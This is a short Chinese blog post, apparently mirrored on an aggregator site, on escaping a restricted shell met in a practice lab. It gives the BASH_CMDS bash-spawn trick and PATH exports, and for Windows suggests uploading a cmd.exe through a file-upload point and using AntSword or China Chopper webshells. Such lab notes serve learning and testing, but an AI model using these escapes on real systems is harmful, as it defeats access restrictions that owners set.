zoukankan
html css js c++ java
小记如何绕过受限的shell
今天的靶场登陆ssh后发现shell受限,如下
woami都执行不了,查看对应的bin目录,发现只能执行4个命令
在网上学到一招可以绕过这种受限制的被阉割的shell
BASH_CMDS[a]=/bin/sh;a #把/bin/bash给a变量
/bin/bash
echo $0 #查看脚本本身的名字
echo $? #命令执行结果反馈,0代表执行成功,其余数字表示不成功
export PATH=$PATH:/bin/ #将/bin 作为PATH环境变量导出
export PATH=$PATH:/usr/bin #将/usr/bin作为PATH环境变量导出
执行完上面加粗的四步之后就可以执行所有命令了
Windows中如果遇到此类情形
1.找到一处可上传文件的位置上传cmd
2.蚁剑可以自定义cmd的环境变量
使用菜刀同样上传cmd文件
设置cmd环境变量 终端输入 set cmd文件的物理地址
查看全文
相关阅读:
springnodejs
js CacheQueue
权重练习
架构师速成8.3-可用性之分库分表
架构师速成8.3-可用性之分布式
架构师速成8.3-可用性
架构师速成8.3-架构师必须要了解的规则(转)
架构师速成6.15-开发框架-单点登录
架构师速成6.14-开发框架-异常处理
架构师速成6.13-开发框架-前后结合
原文地址:https://www.cnblogs.com/sup3rman/p/12392161.html
最新文章
mac下安装及配置tomcat
使用ubuntu作为web开发环境的一些感受
ubuntu系统下如何修改host
ubuntu如何安装nodejs最新版 本
如何避免git每次提交都输入密码
第一个移动前端开源项目-dailog
前端开发工具vue.js开发实践总结
移动前端开发一定会遇上的事
安装wamp2.5报权限错误的解决办法
git常用操作命令
热门文章
javacc学习
大数据统计笔记
spring Multiple MongoTemplate
nodejs session 设计
访问C指针的指针
masm学习
开发 nodejs REST 个人感想
js 动态获取对象多级属性
js ioc 实现
js aop 拦载实现
Copyright © 2011-2022 走看看